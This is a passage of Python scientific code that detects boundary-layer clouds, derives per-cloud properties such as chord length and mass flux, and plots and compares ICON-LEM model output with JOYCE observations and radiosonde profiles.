    Dict_Clouds_arr = f_calculateCloudProperties(time, \
                                                 height, \
                                                 CBarr, \
                                                 CTarr, \
                                                 UpdraftCB, \
                                                 LWP, \
                                                 Hwind, \
                                                 Wwind, \
                                                 LWC)
    duration = []
    chordLength = []
    massFlux = []
    cloudLWP = []
    cloudTimeStart = []
    cloudTimeEnd = []
    meanCT = []
    meanCB = []
    meanCloudThickness = []
    meanUpdraftCB = []
    Nclouds = len(Dict_Clouds_arr)
    meanheightFromCB = np.zeros((Nclouds, len(height)))
    cloudLWC = np.zeros((Nclouds, len(height)))
    cloudLWC.fill(np.nan)
    meanheightFromCB.fill(np.nan)
    # building arrays in which each element corresponds to a cloud
    for iCloud in range(Nclouds):
        duration.append(Dict_Clouds_arr[iCloud]['duration'].total_seconds())
        chordLength.append(Dict_Clouds_arr[iCloud]['chordLength'])
        massFlux.append(Dict_Clouds_arr[iCloud]['MassFlux'])
        cloudLWP.append(Dict_Clouds_arr[iCloud]['meanLWP'])
        cloudLWC[iCloud,:] = Dict_Clouds_arr[iCloud]['meanLWC']
        cloudTimeStart.append(Dict_Clouds_arr[iCloud]['timeStart'])
        cloudTimeEnd.append(Dict_Clouds_arr[iCloud]['timeEnd'])
        meanheightFromCB[iCloud,:] = Dict_Clouds_arr[iCloud]['meanheightFromCB']
        meanCT.append(Dict_Clouds_arr[iCloud]['meanCT'])
        meanCB.append(Dict_Clouds_arr[iCloud]['meanCB'])
        meanCloudThickness.append(Dict_Clouds_arr[iCloud]['cloudThickness'])
        meanUpdraftCB.append(Dict_Clouds_arr[iCloud]['meanUpdraftSpeedCB'])
    if verboseFlag == 1:
        print('cloud properties of duration, chord length, mass flux, mean cloud LWC and LWP calculated')
    # debug plot of the cloud mask with PBL cloud base/top overlaid
    if debuggingFlag == 1:
        fig, ax = plt.subplots(figsize=(10,4))
        ax.xaxis.set_major_formatter(mdates.DateFormatter("%H:%M"))
        ax.xaxis.set_minor_formatter(mdates.DateFormatter("%H:%M"))
        ax.spines["top"].set_visible(False)
        ax.spines["right"].set_visible(False)
        ax.get_xaxis().tick_bottom()
        ax.get_yaxis().tick_left()
        ax.xaxis_date()
        cax = ax.pcolormesh(time, height, cloudMask.transpose(), vmin=0, vmax=3, cmap=plt.cm.get_cmap("RdPu", 4))
        ax.set_ylim(0,12000.) # limits of the y-axes
        #ax.set_xlim(0,24) # limits of the x-axes
        ax.set_title("cloud mask", fontsize=14)
        ax.set_xlabel("time ", fontsize=12)
        ax.set_ylabel("height [m]", fontsize=12)
        plt.plot(time, CBarr, color='black', label='CB PBL')
        plt.plot(time, CTarr, color='black', linestyle=':', label='CT PBL')
        plt.legend()
        cbar = fig.colorbar(cax, ticks=[0, 1, 2, 3], orientation='vertical')
        cbar.ticks=([0,1,2,3])
        cbar.ax.set_yticklabels(['no cloud','liquid','ice', 'mixed phase'])
        cbar.set_label(label="cloud type",size=12)
        cbar.ax.tick_params(labelsize=12)
        cbar.aspect=80
        plt.savefig(pathDebugFig+'cloudMask_'+stringData+'_'+date+'.png', format='png')
    # output dictionary: the length of each per-cloud element equals the
    # number of clouds found in the day
    dictOut = {'cloudMask':cloudMask,
               'timeSerie':time,
               'liquidCloudFraction':mean_CF_liquid,
               'iceCloudFraction':mean_CF_ice,
               'totalCloudFraction':mean_CF_tot,
               'datetimeCloudFraction':datetime_CF,
               'heightCloudFraction':height,
               'duration':duration,
               'cloudLWP':cloudLWP,
               'cloudLWC':cloudLWC,
               'meanheightFromCB':meanheightFromCB,
               'cloudMeanCB':meanCB,
               'cloudMeanCT':meanCT,
               'cloudTimeEnd':cloudTimeEnd,
               'chordLength':chordLength,
               'massFlux':massFlux,
               'timeCloudStart':cloudTimeStart,
               'timeCloudEnd':cloudTimeEnd,
               'cloudUpdraftCB':meanUpdraftCB,
               'Nclouds':Nclouds,
               'LWPall':LWP,
               'UpdraftCB_PBL':UpdraftCB,
               }
    return(dictOut, clouds, PBLclouds)
#---------------------------------------------------------------------------------
# date : 28.01.2019
# author: Claudia Acquistapace
# goal: function that identifies continuous cloud entities and derives (based on definitions in Lareau et al., 2018, JAS)
#       - cloud duration
#       - chord length
#       - mass flux
#       - mean cloud base height
#       - vertical wind one range gate below cloud base
#       - mean LWP per cloud entity
#
# output: array of dictionaries: every dictionary corresponds to an identified cloud and contains the cloud properties
#       - DictCloudPropArr
#--------------------------------------------------------------------------------
def f_calculateCloudProperties(datetime_ICON, \
                               height_ICON, \
                               CBarr, \
                               CTarr, \
                               UpdraftCB, \
                               LWP_ICON, \
                               Hwind_ICON, \
                               w_ICON, \
                               LWC):
    """
    @ author: cacquist
    @ date  : November 2019
    @ goal  : process model and obs data in the same way: identify continuous
              cloud entities from the cloud base time serie and calculate the
              cloud quantities listed below. Local variables are called *_ICON
              because the code was originally developed for icon variables,
              but it applies to obs and model data alike.
    @ INPUT :
        datetime_ICON: time array
        height_ICON  : height array
        CBarr, CTarr : lowest PBL cloud base / top time series (nan = no cloud)
        UpdraftCB    : updraft velocity at cloud base time serie
        LWP_ICON     : LWP time serie
        Hwind_ICON   : horizontal wind matrix (time, height)
        w_ICON       : vertical wind matrix (time, height)
        LWC          : liquid water content / Qc matrix (time, height)
                       NOTE: modified in place (zeros -> nan, values outside
                       CB..CT -> nan); pass a copy if the caller needs it.
    @ OUTPUT:
        list with one dictionary per cloud unit, with keys:
        'timeStart', 'indStart', 'timeEnd', 'indEnd', 'meanLWP', 'meanLWC',
        'meanheightFromCB', 'meanCT', 'stdLWP', 'meanCB', 'WwindCB',
        'MassFlux', 'duration', 'chordLength', 'cloudThickness',
        'meanUpdraftSpeedCB', 'stdUpdraftSpeedCB'
    """
    LWC[LWC == 0] = np.nan # setting to nans null values for better averaging
    cloudStart = 0
    Dict_Clouds_arr = []
    # step 1: detect contiguous cloudy intervals (consecutive non-nan CB).
    # A cloud that extends to the very end of the time serie is not closed
    # and is therefore not counted (original behavior, preserved).
    for itime in range(len(datetime_ICON)-1):
        if (np.isnan(CBarr[itime]) == False) * (cloudStart == 0): # cb found, cloud not started yet
            cloudStart = 1
            timeStart = datetime_ICON[itime]
            indStart = itime
        # while cb keeps being found and cloudStart == 1, nothing happens: cloudy part
        if ((np.isnan(CBarr[itime]) == True) * (cloudStart == 1)):
            # cb lost after a cloudy stretch: close the cloud at the previous
            # time step, store its boundaries and reset the flag
            timeEnd = datetime_ICON[itime-1]
            indEnd = itime-1
            cloudStart = 0
            dict_cloud = {'timeStart':timeStart, 'indStart':indStart, 'timeEnd':timeEnd, 'indEnd':indEnd}
            Dict_Clouds_arr.append(dict_cloud)
            timeStart = np.nan
            timeEnd = np.nan
    # step 2: blank LWC profiles below cloud base and above cloud top
    for itime in range(len(datetime_ICON)):
        if ((~np.isnan(CBarr[itime])) or (~np.isnan(CTarr[itime]))):
            LWC_prof_DF = pd.Series(LWC[itime,:], index=height_ICON)
            mask_CB = (LWC_prof_DF.index < CBarr[itime])
            LWC_prof_DF.loc[mask_CB] = np.nan
            mask_CT = (LWC_prof_DF.index > CTarr[itime])
            LWC_prof_DF.loc[mask_CT] = np.nan
            LWC[itime,:] = LWC_prof_DF.values
        else:
            LWC[itime,:] = np.repeat(np.nan, len(height_ICON))
    # step 3: per-cloud properties — duration, wind below cloud base, mean CB,
    # chord length and mass flux as defined in (Lareau et al., 2018, JAS)
    DictCloudPropArr = []
    for iCloud in range(len(Dict_Clouds_arr)):
        timeStart = Dict_Clouds_arr[iCloud]['timeStart']
        timeEnd = Dict_Clouds_arr[iCloud]['timeEnd']
        duration = timeEnd - timeStart
        iTimeStart = Dict_Clouds_arr[iCloud]['indStart']
        iTimeEnd = Dict_Clouds_arr[iCloud]['indEnd']
        meanLWP = np.nanmedian(LWP_ICON[iTimeStart:iTimeEnd])
        stdLWP = np.nanstd(LWP_ICON[iTimeStart:iTimeEnd])
        meanLWC = np.nanmean(LWC[iTimeStart:iTimeEnd,:], axis=0)
        meanUpdraftCBspeed = np.nanmedian(UpdraftCB[iTimeStart:iTimeEnd])
        stdUpdraftCBspeed = np.nanstd(UpdraftCB[iTimeStart:iTimeEnd])
        # compute the geometric/kinematic properties whenever either the mean
        # LWC profile has valid values or the CB slice is non-empty (the two
        # original branches were byte-identical, so they are merged here)
        if (np.count_nonzero(~np.isnan(meanLWC)) != 0) or (len(CBarr[iTimeStart:iTimeEnd]) != 0):
            meanCB = np.nanmean(CBarr[iTimeStart:iTimeEnd])
            meanCT = np.nanmean(CTarr[iTimeStart:iTimeEnd])
            HwindCloudBase = np.nanmean(Hwind_ICON[iTimeStart:iTimeEnd, f_closest(height_ICON, meanCB)])
            # vertical wind one range gate above the closest CB level
            WwindCloudBase = np.nanmean(w_ICON[iTimeStart:iTimeEnd, f_closest(height_ICON, meanCB)+1])
            chordLength = HwindCloudBase * duration.total_seconds()
            meanheightFromCB = (height_ICON - np.repeat(meanCB, len(height_ICON)))/ \
            (np.repeat(meanCT, len(height_ICON))- np.repeat(meanCB, len(height_ICON)))
            MassFlux = WwindCloudBase * chordLength
            cloudThickness = meanCT - meanCB
        else:
            meanCB = np.nan
            meanCT = np.nan
            HwindCloudBase = np.nan
            WwindCloudBase = np.nan
            chordLength = np.nan
            meanheightFromCB = np.repeat(np.nan, len(height_ICON))
            MassFlux = np.nan
            cloudThickness = np.nan
        # storing data in the dictionary array, one dictionary per cloud unit.
        # BUG FIX: indStart/indEnd previously stored the stale detection-loop
        # variables (always the last cloud's indices); they now store the
        # indices of the cloud being processed.
        dictProp = {'timeStart':timeStart,
                    'indStart':iTimeStart,
                    'timeEnd':timeEnd,
                    'indEnd':iTimeEnd,
                    'meanLWP':meanLWP,
                    'meanLWC':meanLWC,
                    'meanheightFromCB':meanheightFromCB,
                    'meanCT':meanCT,
                    'stdLWP':stdLWP,
                    'meanCB':meanCB,
                    'WwindCB':WwindCloudBase,
                    'MassFlux':MassFlux,
                    'duration':duration,
                    'chordLength':chordLength,
                    'cloudThickness':cloudThickness,
                    'meanUpdraftSpeedCB':meanUpdraftCBspeed,
                    'stdUpdraftSpeedCB':stdUpdraftCBspeed,
                    }
        DictCloudPropArr.append(dictProp)
    return(DictCloudPropArr)
def f_calcMeanStdVarProfiles(field, time, height, date, yy, mm, dd, NprofilesOut, timeIncrement):
    """date   : 02 aug 2019
    author : Claudia Acquistapace
    contact: cacquist@meteo.uni-koeln.de
    goal   : calculate mean/std profiles of a field over consecutive time
             intervals of the day.
    input  :
        - field        : matrix to average, shape (len(time), len(height))
        - time, height : coordinate arrays
        - date         : date string (returned unchanged in the output)
        - yy, mm, dd   : integers for year, month, day (define the day start)
        - NprofilesOut : number of averaged profiles to produce
                         (e.g. 48 with timeIncrement = 30 min)
        - timeIncrement: averaging interval length in minutes
    output :
        OrderedDict with keys 'meanProfiles', 'stdProfiles'
        (both shaped (len(height), NprofilesOut)), 'meanTime'
        (interval start times), 'height', 'date'.
    """
    import collections
    # dataframe view of the field for time-window slicing
    field_DF = pd.DataFrame(field, index=time, columns=height)
    Profiles_var_DF = pd.DataFrame(np.zeros((len(height),NprofilesOut)), \
                                   columns=np.arange(0,NprofilesOut), index=height)
    Std_var_DF = pd.DataFrame(np.zeros((len(height),NprofilesOut)), \
                              columns=np.arange(0,NprofilesOut), index=height)
    deltaT = datetime.timedelta(minutes=timeIncrement)
    datetime_out = []
    for itime in range(0,NprofilesOut):
        # interval [HourInf, HourSup): first window starts at midnight of the day
        if itime == 0:
            HourInf = datetime.datetime(int(yy), int(mm), int(dd), 0, 0, 0)
        else:
            HourInf = HourInf + deltaT
        HourSup = HourInf + deltaT
        datetime_out.append(HourInf)
        field_sliced_t = field_DF.loc[(field_DF.index < HourSup) * (field_DF.index >= HourInf),:]
        field_mean = field_sliced_t.mean(axis=0, skipna=True)
        field_std = field_sliced_t.std(axis=0, skipna=True)
        # BUG FIX: store into column `itime` (0-based). The original code
        # incremented a counter before assigning, so column 0 was never
        # filled (stayed zero) and a spurious extra column NprofilesOut was
        # appended on the last iteration.
        Profiles_var_DF.loc[:,itime] = field_mean
        Std_var_DF.loc[:,itime] = field_std
    orderedDict = collections.OrderedDict()
    orderedDict['meanProfiles'] = Profiles_var_DF.values
    orderedDict['stdProfiles'] = Std_var_DF.values
    orderedDict['meanTime'] = datetime_out
    orderedDict['height'] = height
    orderedDict['date'] = date
    return(orderedDict)
def f_plotCloudFraction(datetime_CF, height, pathFig, CFmean_mod, CFmean_obs, \
CFmeanLiquid_mod, CFmeanLiquid_obs, CFmeanIce_mod, CFmeanIce_obs):
import matplotlib as mpl
import matplotlib.dates as mdates
fig, ax = plt.subplots(figsize=(12,6))
ax.xaxis.set_major_formatter(mdates.DateFormatter("%H:%M"))
ax.xaxis.set_minor_formatter(mdates.DateFormatter("%H:%M"))
ax.spines["top"].set_visible(False)
ax.spines["right"].set_visible(False)
ax.get_xaxis().tick_bottom()
ax.get_yaxis().tick_left()
ax.xaxis_date()
label_size = 16
mpl.rcParams['xtick.labelsize'] = label_size
mpl.rcParams['ytick.labelsize'] = label_size
cax1 = ax.pcolormesh(datetime_CF, height, CFmean_mod.transpose(), vmin=0., vmax=0.4, cmap='BuPu')
ax.set_ylim(400.,4000.) # limits of the y-axe
ax.set_xlim() # limits of the x-axes
ax.set_title("cloud fraction icon-lem - JOYCE", fontsize=16)
ax.set_xlabel("time [hh:mm]", fontsize=16)
ax.set_ylabel("height [m]", fontsize=16)
#plt.plot(time_ICON, CT_array, color='black', label='cloud top')
#plt.plot(time_ICON, CB_array, color='black',label='cloud base')
plt.legend(loc='upper left')
cbar = fig.colorbar(cax1, orientation='vertical')
#cbar.ticks=([0,1,2,3])
#cbar.ax.set_yticklabels(['no cloud','liquid','ice','mixed phase'])
cbar.set_label(label="cloud fraction ",size=14)
cbar.ax.tick_params(labelsize=14)
cbar.aspect=80
fig.tight_layout()
plt.savefig(pathFig+'cloudFraction_tot_wholeDataset_mod.png', format='png')
fig, ax = plt.subplots(figsize=(12,6))
ax.xaxis.set_major_formatter(mdates.DateFormatter("%H:%M"))
ax.xaxis.set_minor_formatter(mdates.DateFormatter("%H:%M"))
ax.spines["top"].set_visible(False)
ax.spines["right"].set_visible(False)
ax.get_xaxis().tick_bottom()
ax.get_yaxis().tick_left()
ax.xaxis_date()
label_size = 16
mpl.rcParams['xtick.labelsize'] = label_size
mpl.rcParams['ytick.labelsize'] = label_size
cax1 = ax.pcolormesh(datetime_CF, height, CFmean_obs.transpose(), vmin=0., vmax=0.4, cmap='BuPu')
ax.set_ylim(400.,4000.) # limits of the y-axe
ax.set_xlim() # limits of the x-axes
ax.set_title("cloud fraction obs - JOYCE", fontsize=16)
ax.set_xlabel("time [hh:mm]", fontsize=16)
ax.set_ylabel("height [m]", fontsize=16)
#plt.plot(time_ICON, CT_array, color='black', label='cloud top')
#plt.plot(time_ICON, CB_array, color='black',label='cloud base')
plt.legend(loc='upper left')
cbar = fig.colorbar(cax1, orientation='vertical')
#cbar.ticks=([0,1,2,3])
#cbar.ax.set_yticklabels(['no cloud','liquid','ice','mixed phase'])
cbar.set_label(label="cloud fraction ",size=14)
cbar.ax.tick_params(labelsize=14)
cbar.aspect=80
fig.tight_layout()
plt.savefig(pathFig+'cloudFraction_tot_wholeDataset_obs.png', format='png')
fig, ax = plt.subplots(figsize=(12,6))
ax.xaxis.set_major_formatter(mdates.DateFormatter("%H:%M"))
ax.xaxis.set_minor_formatter(mdates.DateFormatter("%H:%M"))
ax.spines["top"].set_visible(False)
ax.spines["right"].set_visible(False)
ax.get_xaxis().tick_bottom()
ax.get_yaxis().tick_left()
ax.xaxis_date()
label_size = 16
mpl.rcParams['xtick.labelsize'] = label_size
mpl.rcParams['ytick.labelsize'] = label_size
cax1 = ax.pcolormesh(datetime_CF, height, CFmeanLiquid_mod.transpose(), vmin=0., vmax=0.4, cmap='BuPu')
ax.set_ylim(400.,4000.) # limits of the y-axe
ax.set_xlim() # limits of the x-axes
ax.set_title("cloud fraction icon-lem - JOYCE", fontsize=16)
ax.set_xlabel("time [hh:mm]", fontsize=16)
ax.set_ylabel("height [m]", fontsize=16)
#plt.plot(time_ICON, CT_array, color='black', label='cloud top')
#plt.plot(time_ICON, CB_array, color='black',label='cloud base')
plt.legend(loc='upper left')
cbar = fig.colorbar(cax1, orientation='vertical')
#cbar.ticks=([0,1,2,3])
#cbar.ax.set_yticklabels(['no cloud','liquid','ice','mixed phase'])
cbar.set_label(label="cloud fraction ",size=14)
cbar.ax.tick_params(labelsize=14)
cbar.aspect=80
fig.tight_layout()
plt.savefig(pathFig+'cloudFraction_liq_wholeDataset_mod.png', format='png')
fig, ax = plt.subplots(figsize=(12,6))
ax.xaxis.set_major_formatter(mdates.DateFormatter("%H:%M"))
ax.xaxis.set_minor_formatter(mdates.DateFormatter("%H:%M"))
ax.spines["top"].set_visible(False)
ax.spines["right"].set_visible(False)
ax.get_xaxis().tick_bottom()
ax.get_yaxis().tick_left()
ax.xaxis_date()
label_size = 16
mpl.rcParams['xtick.labelsize'] = label_size
mpl.rcParams['ytick.labelsize'] = label_size
cax1 = ax.pcolormesh(datetime_CF, height, CFmeanLiquid_obs.transpose(), vmin=0., vmax=0.4, cmap='BuPu')
ax.set_ylim(400.,4000.) # limits of the y-axe
ax.set_xlim() # limits of the x-axes
ax.set_title("cloud fraction obs - JOYCE", fontsize=16)
ax.set_xlabel("time [hh:mm]", fontsize=16)
ax.set_ylabel("height [m]", fontsize=16)
#plt.plot(time_ICON, CT_array, color='black', label='cloud top')
#plt.plot(time_ICON, CB_array, color='black',label='cloud base')
plt.legend(loc='upper left')
cbar = fig.colorbar(cax1, orientation='vertical')
#cbar.ticks=([0,1,2,3])
#cbar.ax.set_yticklabels(['no cloud','liquid','ice','mixed phase'])
cbar.set_label(label="cloud fraction ",size=14)
cbar.ax.tick_params(labelsize=14)
cbar.aspect=80
fig.tight_layout()
plt.savefig(pathFig+'cloudFraction_liq_wholeDataset_obs.png', format='png')
# ---- time-height map of the mean ice cloud fraction from the ICON-LEM model
fig, ax = plt.subplots(figsize=(12,6))
ax.xaxis.set_major_formatter(mdates.DateFormatter("%H:%M"))
ax.xaxis.set_minor_formatter(mdates.DateFormatter("%H:%M"))
ax.spines["top"].set_visible(False)
ax.spines["right"].set_visible(False)
ax.get_xaxis().tick_bottom()
ax.get_yaxis().tick_left()
ax.xaxis_date()  # interpret x values as dates
label_size = 16
mpl.rcParams['xtick.labelsize'] = label_size
mpl.rcParams['ytick.labelsize'] = label_size
# color map of the mean ice cloud fraction (model); transposed to (height, time)
cax1 = ax.pcolormesh(datetime_CF, height, CFmeanIce_mod.transpose(), vmin=0., vmax=0.4, cmap='BuPu')
ax.set_ylim(400.,4000.)  # limits of the y-axis [m]
ax.set_xlim()  # NOTE(review): no arguments -> no-op, x-axis keeps autoscaling
ax.set_title("cloud fraction icon-lem - JOYCE", fontsize=16)
ax.set_xlabel("time [hh:mm]", fontsize=16)
ax.set_ylabel("height [m]", fontsize=16)
#plt.plot(time_ICON, CT_array, color='black', label='cloud top')
#plt.plot(time_ICON, CB_array, color='black',label='cloud base')
plt.legend(loc='upper left')
cbar = fig.colorbar(cax1, orientation='vertical')
#cbar.ticks=([0,1,2,3])
#cbar.ax.set_yticklabels(['no cloud','liquid','ice','mixed phase'])
cbar.set_label(label="cloud fraction ",size=14)
cbar.ax.tick_params(labelsize=14)
cbar.aspect=80
fig.tight_layout()
plt.savefig(pathFig+'cloudFraction_ice_wholeDataset_mod.png', format='png')
# ---- time-height map of the mean ice cloud fraction from the observations
fig, ax = plt.subplots(figsize=(12,6))
ax.xaxis.set_major_formatter(mdates.DateFormatter("%H:%M"))
ax.xaxis.set_minor_formatter(mdates.DateFormatter("%H:%M"))
ax.spines["top"].set_visible(False)
ax.spines["right"].set_visible(False)
ax.get_xaxis().tick_bottom()
ax.get_yaxis().tick_left()
ax.xaxis_date()  # interpret x values as dates
label_size = 16
mpl.rcParams['xtick.labelsize'] = label_size
mpl.rcParams['ytick.labelsize'] = label_size
# color map of the mean ice cloud fraction (observations); transposed to (height, time)
cax1 = ax.pcolormesh(datetime_CF, height, CFmeanIce_obs.transpose(), vmin=0., vmax=0.4, cmap='BuPu')
ax.set_ylim(400.,4000.)  # limits of the y-axis [m]
ax.set_xlim()  # NOTE(review): no arguments -> no-op, x-axis keeps autoscaling
ax.set_title("cloud fraction obs - JOYCE", fontsize=16)
ax.set_xlabel("time [hh:mm]", fontsize=16)
ax.set_ylabel("height [m]", fontsize=16)
#plt.plot(time_ICON, CT_array, color='black', label='cloud top')
#plt.plot(time_ICON, CB_array, color='black',label='cloud base')
plt.legend(loc='upper left')
cbar = fig.colorbar(cax1, orientation='vertical')
#cbar.ticks=([0,1,2,3])
#cbar.ax.set_yticklabels(['no cloud','liquid','ice','mixed phase'])
cbar.set_label(label="cloud fraction ",size=14)
cbar.ax.tick_params(labelsize=14)
cbar.aspect=80
fig.tight_layout()
plt.savefig(pathFig+'cloudFraction_ice_wholeDataset_obs.png', format='png')
def f_convertPressureToHeight(P,T):
    """
    Convert a pressure profile to height with the hypsometric (barometric) formula.

    Parameters
    ----------
    P : array-like
        Pressure profile [kPa].
    T : array-like
        Temperature profile [K], same length as P.

    Returns
    -------
    numpy.ndarray
        Height [m] above the P0 = 101.325 kPa reference level.

    Note
    ----
    BUGFIX: the original implementation used log10, but the barometric
    formula h = -(R*T)/(M*g) * ln(P/P0) requires the natural logarithm,
    so heights were underestimated by a factor ln(10) ~ 2.30.
    The element-wise loop was also replaced by a vectorized expression.
    """
    P0 = 101.325  # reference (sea level) pressure [kPa]
    g = 9.807     # gravitational acceleration [m s-2]
    M = 0.02896   # molar mass of dry air [kg mol-1]
    R = 8.3143    # universal gas constant [J mol-1 K-1]
    P = np.asarray(P, dtype=float)
    T = np.asarray(T, dtype=float)
    # hypsometric equation: h = (R*T)/(M*g) * ln(P0/P)
    h = -(R * T) * np.log(P / P0) / (M * g)
    return(h)
def f_plotVarianceWSingleDays(date,varWmean_obs,varWmean_mod, varWstd_obs, \
                              varWstd_mod,indHourPlotStart, height, pathFig):
    """
    Plot hourly mean profiles of vertical-velocity variance, obs vs ICON.

    Draws a 2x5 panel figure: panel i shows the mean var(w) profile for hour
    indHourPlotStart + i - 1 (obs in black, model in red) with a +-1 std
    shaded band, and saves it to
    pathFig + 'varW_Profiles_diurnal_cycle_' + date + '.png'.

    Parameters
    ----------
    date : str
        Date string, used only in the output file name.
    varWmean_obs, varWmean_mod : 2d arrays
        Mean var(w), indexed as (height, hour) -- TODO confirm orientation.
    varWstd_obs, varWstd_mod : 2d arrays
        Standard deviation of var(w), same shape as the means.
    indHourPlotStart : int
        Column index (hour) of the first panel.
    height : 1d array
        Height grid [m].
    pathFig : str
        Output directory for the figure.
    """
    Nrows = 2
    Ncols = 5
    # range(1, Nplots) below yields exactly Nrows*Ncols panel indices (1..10)
    Nplots = Nrows*Ncols+1
    # ---- plotting hourly profiles of variance of vertical velocity during the day
    fig, ax = plt.subplots(nrows=Nrows, ncols=Ncols, figsize=(14,10))
    #matplotlib.rcParams['savefig.dpi'] = 300
    plt.gcf().subplots_adjust(bottom=0.15)
    fig.tight_layout()
    ymax = 3000.   # upper height limit [m]
    ymin = 107.    # lower height limit [m]
    xmax = 1.5     # upper var(w) limit
    fontSizeTitle = 16
    fontSizeX = 15
    fontSizeY = 15
    #timeTitles = [']
    for indPlot in range(1, Nplots):
        # one panel per hour; plt.subplot re-selects the current axes
        ax = plt.subplot(2,5,indPlot)
        ax.spines["top"].set_visible(False)
        ax.spines["right"].set_visible(False)
        ax.get_xaxis().tick_bottom()
        ax.get_yaxis().tick_left()
        #ax.text(1.8, ymax-200., 'a)', fontsize=15)
        matplotlib.rc('xtick', labelsize=15)  # sets dimension of ticks in the plots
        matplotlib.rc('ytick', labelsize=15)  # sets dimension of ticks in the plots
        plt.plot(varWmean_obs[:,indHourPlotStart], height, label='obs', color='black')
        #plt.errorbar(varWmean_obs[:,8], height, xerr=varWstd_obs[:,8], color='black')
        plt.plot(varWmean_mod[:,indHourPlotStart], height, label='ICON', color='red')
        #plt.errorbar(varWmean_mod[:,8], height, xerr=varWstd_mod[:,8], color='red')
        # shaded +-1 std band for the observations
        y1 = varWmean_obs[:,indHourPlotStart]-varWstd_obs[:,indHourPlotStart]
        y2 = varWmean_obs[:,indHourPlotStart]+varWstd_obs[:,indHourPlotStart]
        plt.fill_betweenx(height, y1, y2, where=y2> y1, facecolor='black', alpha=0.2)
        # shaded +-1 std band for the model
        y1 = varWmean_mod[:,indHourPlotStart]-varWstd_mod[:,indHourPlotStart]
        y2 = varWmean_mod[:,indHourPlotStart]+varWstd_mod[:,indHourPlotStart]
        plt.fill_betweenx(height, y1, y2, where=y2> y1, facecolor='red', alpha=0.2)
        plt.legend(loc='upper right', fontsize=14)
        plt.ylim(ymin,ymax)
        plt.xlim(0.,xmax)
        #plt.title('8:00 UTC', fontsize=fontSizeTitle)
        # NOTE(review): variance of w would be [m2/s2]; label says [m/s] -- confirm
        plt.xlabel('var(w) [m/s]', fontsize=fontSizeX)
        plt.ylabel('height [m]', fontsize=fontSizeY)
        plt.tight_layout()
        # advance to the next hour for the next panel
        indHourPlotStart = indHourPlotStart+1
    plt.savefig(pathFig+'varW_Profiles_diurnal_cycle_'+date+'.png', format='png')
# finding how many radiosondes are launched during the selected day:
def f_reshapeRadiosondes(new_dict):
    """
    Collect the radiosonde soundings of one day into 2d profile matrices.

    Parameters
    ----------
    new_dict : list
        new_dict[0] is a list of per-sounding dictionaries with keys
        'P', 'T', 'theta_v', 'RH', 'height', 'time', 'z_lcl', 'z_ccl',
        'LTS', 'PBLheight'.

    Returns
    -------
    dict
        Profile matrices 'P', 'T', 'RH', 'theta_v', 'height' of shape
        (lenghtMin, Nsoundings) -- one column per sounding, truncated to the
        number of levels of the shortest sounding -- plus the per-sounding
        lists 'time', 'lcl', 'ccl', 'lts', 'pblHeight'.

    Note
    ----
    BUGFIX: the original built the matrices with
    np.reshape(list, (lenghtMin, Nsoundings)), which is a row-major reshape,
    not a transpose: whenever lenghtMin != Nsoundings the values were
    scrambled across columns, while downstream code indexes [:, indSounding].
    The matrices are now built with an explicit transpose.
    """
    P_radios_obs = []
    T_radios_obs = []
    theta_v_radios_obs = []
    RH_radios_obs = []
    height_radios_obs = []
    time_radios_obs = []
    lengthRadiosonde = []
    lcl_radios_obs = []
    ccl_radios_obs = []
    lts_radios_obs = []
    pblHeight_radios_obs = []
    Nsoundings = len(new_dict[0])
    for indSoundings in range(Nsoundings):
        # pressure divided by 10. (presumably hPa -> kPa) -- TODO confirm units
        P_radios_obs.append(new_dict[0][indSoundings]['P']/10.)
        T_radios_obs.append(new_dict[0][indSoundings]['T'])
        theta_v_radios_obs.append(new_dict[0][indSoundings]['theta_v'])
        RH_radios_obs.append(new_dict[0][indSoundings]['RH'])
        height_radios_obs.append(new_dict[0][indSoundings]['height'])
        time_radios_obs.append(new_dict[0][indSoundings]['time'])
        lengthRadiosonde.append(len(new_dict[0][indSoundings]['P']))
        lcl_radios_obs.append(new_dict[0][indSoundings]['z_lcl'])
        ccl_radios_obs.append(new_dict[0][indSoundings]['z_ccl'])
        lts_radios_obs.append(new_dict[0][indSoundings]['LTS'])
        pblHeight_radios_obs.append(new_dict[0][indSoundings]['PBLheight'])
    # truncate every sounding to the number of levels of the shortest one
    # (slicing the shortest sounding itself is a no-op, so no special case needed)
    index_min = np.argmin(lengthRadiosonde)
    lenghtMin = lengthRadiosonde[index_min]
    P_resized = []
    T_resized = []
    theta_v_resized = []
    RH_resized = []
    height_resized = []
    for indSoundings in range(Nsoundings):
        P_resized.append(P_radios_obs[indSoundings][0:lenghtMin])
        T_resized.append(T_radios_obs[indSoundings][0:lenghtMin])
        RH_resized.append(RH_radios_obs[indSoundings][0:lenghtMin])
        theta_v_resized.append(theta_v_radios_obs[indSoundings][0:lenghtMin])
        height_resized.append(height_radios_obs[indSoundings][0:lenghtMin])
    # building matrices of shape (lenghtMin, Nsoundings), one column per sounding
    P_radiosonde_obs = np.array(P_resized).transpose()
    T_radiosonde_obs = np.array(T_resized).transpose()
    RH_radiosonde_obs = np.array(RH_resized).transpose()
    theta_v_radiosonde_obs = np.array(theta_v_resized).transpose()
    height_radiosonde_obs = np.array(height_resized).transpose()
    dict_radios = {'P':P_radiosonde_obs,
                   'T':T_radiosonde_obs,
                   'RH':RH_radiosonde_obs,
                   'theta_v':theta_v_radiosonde_obs,
                   'height':height_radiosonde_obs,
                   'time':time_radios_obs,
                   'lcl':lcl_radios_obs,
                   'ccl':ccl_radios_obs,
                   'lts':lts_radios_obs,
                   'pblHeight':pblHeight_radios_obs}
    return(dict_radios)
# function to calculate mean theta_v from the model around the hours of the radiosondes and averaging
# =============================================================================
"""the function goes through the number of days of the dataset. For each day, it counts the number of
radiosonde launched and reads each of them. For each hour corresponding to a radiosonde of the day,
it calculates the mean quantities of the model around that hour (+-1 hour)
it then returns for every hour, a dictionary in which radiosonde data and
the corresponding mean model quantities are stored together.
Every dictionary associated to a given hour is appended to a list which is
piling all hours together, independently of the day.
each element of the list is a dictionary of an hour """
def f_calculateMeanThetaVModelProfiles(time_radiosondes, \
                                       theta_v_radiosondes,\
                                       T_radiosondes, \
                                       rh_radiosObs, \
                                       height_radiosondes, \
                                       lcl_radiosondes, \
                                       ccl_radiosondes, \
                                       lts_radiosondes, \
                                       pblHeight_radiosondes, \
                                       theta_v_mod, \
                                       T_mod, \
                                       rh_mod, \
                                       time_mod, \
                                       height_mod, \
                                       lcl_mod, \
                                       ccl_mod,\
                                       lts_mod, \
                                       pblHeight_mod):
    """
    Pair every radiosonde with the model mean around its launch hour.

    For each day and each radiosonde launched that day, the model fields
    (theta_v, T, RH) and scalars (lcl, ccl, lts, pbl height) are averaged
